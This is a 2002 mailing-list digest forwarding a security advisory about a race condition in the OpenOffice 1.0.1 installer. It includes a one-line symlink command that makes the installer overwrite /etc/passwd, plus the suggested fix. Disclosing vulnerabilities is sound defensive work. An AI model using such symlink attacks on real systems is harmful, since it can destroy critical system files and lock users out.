[Vulnerable for a short while when OpenOffice is installing. Please
follow the advice in the mail if you're paranoid -- Raju]
This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]>
From: "Larry W. Cashdollar" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: OpenOffice 1.0.1 Race condition during installation.
Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
Vapid Labs
Larry W. Cashdollar
9/9/02
Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.
Severity: Low
Description: A very simple and easy to exploit race condition exist during the
installation of OpenOffice. During this window a malicous user could create a
symlink in /tmp and overwrite arbitrary files.
Exploit:
As a normal user:
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
Where $USERNAME is the installer account name, probably root.
will result in the password file being over written with:
# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
Fix:
Create a directory under /tmp to work from. With restrictive permissions.
References:
http://www.openoffice.org/dev_docs/source/1.0.1/index.html
Larry W. Cashdollar
[EMAIL PROTECTED]
http://vapid.ath.cx
------------------------------
End of this Digest
******************
--
Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/
It is the mind that moves
================================================
To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject
header. Check archives at http://www.mail-archive.com/ilugd%40wpaa.org
